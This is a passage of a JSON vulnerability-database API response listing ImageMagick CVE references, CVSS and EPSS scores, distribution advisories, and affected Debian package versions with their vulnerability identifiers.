"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1707770", "reference_id": "1707770", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1707770" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=927830", "reference_id": "927830", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=927830" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4034-1/", "reference_id": "USN-4034-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4034-1/" }, { "reference_url": "https://usn.ubuntu.com/6985-1/", "reference_id": "USN-6985-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6985-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-11470" ], "risk_score": 2.4, "exploitability": "0.5", "weighted_severity": "4.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-12rd-dhh3-h3ea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82360?format=api", "vulnerability_id": "VCID-152y-9pjj-p7b7", "summary": "ImageMagick: memory leaks at AcquireMagickMemory because of an error in MagickWand/mogrify.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13310.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13310.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13310", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.28589", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.28705", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.29211", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.29263", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.29077", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.2914", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.29182", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.29188", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.29142", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.29089", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.29116", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.29093", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.29136", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13310" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730333", "reference_id": "1730333", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730333" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": 